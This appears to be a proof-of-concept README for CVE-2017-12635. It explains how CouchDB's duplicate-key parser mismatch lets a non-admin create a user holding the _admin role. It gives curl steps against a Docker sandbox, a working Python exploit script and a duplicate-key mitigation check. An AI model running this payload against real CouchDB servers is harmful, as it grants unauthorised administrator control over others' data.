tranmanhdat/couchdb_cve-2017-12635

Apache CouchDB < 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation

Detail

  • Apache CouchDB is a document-oriented NoSQL database implemented in Erlang.
  • CouchDB validates writes to the _users database with a JavaScript validate_doc_update function, but stores and later reads the document through its Erlang JSON parser. The two parsers disagree on duplicate keys: the JavaScript parser keeps the last occurrence of a repeated key, while the Erlang side returns the first. In CouchDB before 1.7.0 and 2.x before 2.1.1 this lets a non-admin user submit a _users document with two roles keys: the validator sees the harmless second one, while the stored document carries the first, which can include the special _admin role that denotes server administrators.
    To recap, the vulnerability allows non-admin users to give themselves admin privileges.
  • CouchDB uses a special database (called _users by default) to store information about registered users. This is a system database: it shares the common database API, but extra security-related constraints and a fixed document structure apply.
    Only administrators may GET, PUT or DELETE arbitrary documents in the _users database.
    Regular users may only read (GET /_users/org.couchdb.user:<username>) or modify (PUT /_users/org.couchdb.user:<username>) the document they own. As the steps below show, an unauthenticated client can still create a new user document as long as its roles list is empty, and that is the write the bug abuses.
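The parser discrepancy above, reproduced as an added example (this is not code from the repository or from CouchDB). Python's json.loads has the same last-key-wins behaviour as the JavaScript side, and an object_pairs_hook models the Erlang proplist lookup, where the first key wins. The validate_new_user_doc function is a simplified model of the roles check in the _users validation function, not CouchDB's own code, and the request body is constructed to match step 8 of the README.

```python
import json

# Constructed body, identical to the one sent in step 8 of the README.
# It is a raw string on purpose: json.dumps() never emits a duplicate key,
# so a client has to assemble the malicious document by hand.
DUPLICATE_ROLES_BODY = (
    '{"name": "guest", "password": "guest", '
    '"roles": ["_admin"], "roles": [], "type": "user"}'
)


def parse_last_wins(body):
    """Model of the JavaScript side (JSON.parse in the query server): a
    repeated key overwrites the earlier value, so the last one wins.
    Python's json.loads has the same semantics."""
    return json.loads(body)


def parse_first_wins(body):
    """Model of the Erlang side: jiffy keeps every pair in a proplist and
    couch_util:get_value/2 returns the first match, so the first one wins."""
    def first_wins(pairs):
        obj = {}
        for key, value in pairs:
            obj.setdefault(key, value)  # keep the first occurrence only
        return obj
    return json.loads(body, object_pairs_hook=first_wins)


def validate_new_user_doc(new_doc, user_is_admin):
    """Simplified model (assumption, not CouchDB's code) of the roles check in
    _users' validate_doc_update for a newly created document: anyone except
    an admin must submit an empty roles list."""
    if not user_is_admin and len(new_doc.get("roles", [])) > 0:
        raise PermissionError("Only _admin may set roles")
    return True


def roles_granted(body, user_is_admin=False):
    """Validate the body the way the JavaScript validator sees it, then return
    the roles the Erlang authentication layer will read from the stored doc."""
    validate_new_user_doc(parse_last_wins(body), user_is_admin)
    return parse_first_wins(body)["roles"]


def exploit_works(body):
    """True when a non-admin submission passes validation yet ends up with
    the _admin role in the stored document."""
    try:
        return "_admin" in roles_granted(body)
    except PermissionError:
        return False


def duplicate_keys(body):
    """Defensive check for a proxy or front end: keys repeated inside any
    single JSON object of the document. Reject the request if non-empty."""
    dups = set()

    def record(pairs):
        keys = [k for k, _ in pairs]
        dups.update(k for k in keys if keys.count(k) > 1)
        return dict(pairs)

    json.loads(body, object_pairs_hook=record)
    return dups


if __name__ == "__main__":
    print("validator sees roles =", parse_last_wins(DUPLICATE_ROLES_BODY)["roles"])
    print("stored document grants roles =", roles_granted(DUPLICATE_ROLES_BODY))
    print("duplicate keys in body:", duplicate_keys(DUPLICATE_ROLES_BODY))
```

The duplicate_keys check is the mitigation a reverse proxy in front of an unpatched instance can apply: a well-formed client never needs to repeat a key, so any body with duplicates can be rejected with 400 before it reaches CouchDB.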

Steps to exploit

  1. Run docker image:
    docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1

  2. Make sure the CouchDB instance is up and answering requests
    curl -X GET http://localhost:5984

  3. Query: All databases in the instance
    curl -X GET http://localhost:5984/_all_dbs

  4. Query: Create a server admin with credentials admin:admin
    curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'
    This works without credentials because a fresh 1.6.1 instance with no admins defined is in "admin party" mode, where every client is treated as an admin

  5. Query: Try to create a new database named records
    curl -X PUT http://localhost:5984/records
    This fails with 401 Unauthorized: now that a server admin exists, only admins may create databases, and the request carries no credentials

  6. Query: Create a new database named records with admin authentication
    curl -X PUT http://admin:admin@localhost:5984/records

  7. Query: Create a new document in the _users database, asking for the _admin role directly

    curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
     -H "Accept: application/json" \
     -H "Content-Type: application/json" \
     -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
    

    Rejected with 403 Forbidden: the validate_doc_update function of _users refuses a non-empty roles list from any client that is not an admin

  8. Query: Create the same document in the _users database with two roles keys

    curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
     -H "Accept: application/json" \
     -H "Content-Type: application/json" \
     -d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
    

    Accepted with 201 Created. The JavaScript validator parses the body with last-key-wins semantics and sees "roles": [], so the non-admin check passes; the Erlang side keeps the first key, so the stored document carries "roles": ["_admin"] and guest is now a server admin

  9. Query: Create a new database named new_records with guest authentication
    curl -X PUT http://guest:guest@localhost:5984/new_records

  10. Query: Delete the database named new_records with guest authentication
    curl -X DELETE http://guest:guest@localhost:5984/new_records
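Steps 7 to 10 automated in one script, as an added example that is not part of the repository. It uses only the standard library: the document with two roles keys is assembled by hand (json.dumps cannot emit duplicate keys), the user is created unauthenticated exactly as in step 8, and the verdict comes from step 9: only a database created by the fresh user proves escalation, because a patched server still creates the user, just without the _admin role. The base URL, user name and database name are taken from the README; the function names are this example's own.

```python
import base64
import json
import urllib.error
import urllib.request

# Constructed target: the sandbox container from step 1. Adjust as needed.
BASE_URL = "http://localhost:5984"


def user_doc_with_duplicate_roles(name, password, hidden_roles=("_admin",)):
    """Assemble the step-8 document by hand. The first 'roles' key carries the
    roles that end up stored; the second, empty one is what the validator sees."""
    return (
        '{"name": %s, "password": %s, "roles": %s, "roles": [], "type": "user"}'
        % (json.dumps(name), json.dumps(password), json.dumps(list(hidden_roles)))
    )


def couch(method, path, body=None, auth=None, base_url=BASE_URL):
    """Minimal CouchDB HTTP client. Returns (status, decoded JSON body) and
    reports 4xx/5xx as ordinary results instead of raising."""
    headers = {"Accept": "application/json"}
    data = None
    if body is not None:
        headers["Content-Type"] = "application/json"
        data = body.encode()
    if auth is not None:  # HTTP Basic, same as user:pass@host in the curl steps
        token = base64.b64encode(("%s:%s" % auth).encode()).decode()
        headers["Authorization"] = "Basic " + token
    req = urllib.request.Request(base_url + path, data=data, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"null")


def outcome(user_create_status, db_create_status):
    """Classify the results of steps 8 and 9. Creating the user proves nothing
    on its own; only the database PUT by that user shows whether _admin stuck."""
    if user_create_status in (401, 403):
        return "user creation rejected"
    if user_create_status not in (201, 202):
        return "unexpected status %d on user creation" % user_create_status
    if db_create_status in (201, 202):
        return "vulnerable: new user is a server admin"
    if db_create_status in (401, 403):
        return "not vulnerable: user created without admin role"
    return "unexpected status %d on database creation" % db_create_status


def run(base_url=BASE_URL, name="guest", password="guest", probe_db="new_records"):
    """Steps 8, 9 and 10: register the user, probe with a database create,
    and delete the probe database again when it was created."""
    doc = user_doc_with_duplicate_roles(name, password)
    user_status, _ = couch("PUT", "/_users/org.couchdb.user:" + name, doc, base_url=base_url)
    db_status, _ = couch("PUT", "/" + probe_db, auth=(name, password), base_url=base_url)
    if db_status in (201, 202):
        couch("DELETE", "/" + probe_db, auth=(name, password), base_url=base_url)
    return outcome(user_status, db_status)


if __name__ == "__main__":
    print(run())
```

Run step 4 first: while the instance is still in admin party mode, the database PUT in step 9 succeeds for everyone and the "vulnerable" verdict would say nothing about the bug. Re-running the script against the same instance also needs a new user name, since the step-8 PUT without a _rev fails with 409 Conflict once the document exists.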
